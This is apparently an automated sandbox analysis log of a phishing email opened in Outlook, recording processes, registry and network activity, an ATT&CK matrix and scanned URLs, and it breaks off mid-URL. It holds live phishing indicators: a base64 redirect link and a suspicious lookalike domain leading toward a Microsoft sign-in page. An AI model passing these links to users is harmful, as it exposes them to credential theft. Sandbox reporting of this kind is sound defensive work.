Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49877 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49878 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49879 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49882 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1480_866312061
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1480_866312061
Source: classification engineClassification label: mal56.phis.winEML@33/57@107/305
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250326T1553440089-7120.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phishing.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3FFE4162-6D4E-4D8B-8C6E-8324EE33DBF2" "767E59B5-AE85-4FE0-9A1B-DF37A468DC62" "7120" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,10921341807898213264,10042530571118757644,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3FFE4162-6D4E-4D8B-8C6E-8324EE33DBF2" "767E59B5-AE85-4FE0-9A1B-DF37A468DC62" "7120" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,10921341807898213264,10042530571118757644,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation21
Browser Extensions
1
Process Injection
11
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
1
DLL Side-Loading
1
Modify Registry
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
Extra Window Memory Injection
1
Process Injection
Security Account Manager13
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://linktube.com/api/me0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/370162274269334?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C1320%Avira URL Cloudsafe
https://api.linktube.com/storage/projects/12741/avatars/RotZvuHFZltAXAC1.png0%Avira URL Cloudsafe
https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=2080%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/209431097234591?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C1150%Avira URL Cloudsafe
https://linktube.com/_nuxt/fc61e2c5da5fa4b1ee14.js0%Avira URL Cloudsafe
https://linktube.com/_nuxt/52bce4bcd71977610647.js0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/webfonts/fa-brands-400.woff20%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/brands.min.css0%Avira URL Cloudsafe
https://linktube.com/_nuxt/e114ae80e4b2d47f2989.js0%Avira URL Cloudsafe
https://linktube.com/api/pages/20701/track0%Avira URL Cloudsafe
https://linktube.com/_nuxt/7db29c7d4236cabf432a.js0%Avira URL Cloudsafe
https://linktube.com/_nuxt/30e4908824f75617b76a.js0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/138748961041622?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C1320%Avira URL Cloudsafe
https://linktube.com/_nuxt/b6ccb04ec77bec22f317.js0%Avira URL Cloudsafe
https://api.factors.ai/sdk/get_info0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/solid.min.css0%Avira URL Cloudsafe
https://app.factors.ai/assets/factors.js0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/fontawesome.min.css0%Avira URL Cloudsafe
https://linktube.com/_nuxt/85ae7cee2ddbc92082ce.js0%Avira URL Cloudsafe
https://linktube.com/_nuxt/manifest.4ba95c29.json0%Avira URL Cloudsafe
https://linktube.com/sw.js0%Avira URL Cloudsafe
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638786156691492130.MDNmNjcxNDItZDkxMy00YzIwLTkyMGYtM2ZmYWY5MGM0MzI1ZTU5M2IyZTMtZDVmOC00N2MwLTliZWItYjc4MDFhMjI5MDc1&ui_locales=en-US&mkt=en-US&client-request-id=9f85fc14-bc67-4c6a-b4d7-6f6ae37e0f7b&state=xcmXxtfbPduD7crhPV_ThOnlG7wD6YDGYrLGh6j3MNeuKWwBi0O5aWl6j_A-JTE2wEw9y_QFs-x_BAfJKkiVcSAULW2Tuf70IkBm0Y04sR6MB4ZcKizVNnrjf2aoLr_QK_B2vPkRjrXIN3RJ-IobP92ZDoHp3WRLjBQJ0XukOSPR-H91w_44dqqMKUjpup0yjziOr_CKm7F6M9XcIs1zraqkuCyp_hjByx-MWmyhf6kfS9we6P56Wi0Hqgq4BdHDTm-XHTrS-1I9M6wO22bazQ&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.00%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-strategies.prod.js0%Avira URL Cloudsafe
https://linktube.com/api/links/140134/track0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-precaching.prod.js0%Avira URL Cloudsafe
https://hzofjndpntxsowciisqm.ecohmlsdeltiempo.it.com/0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/432952554585575?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%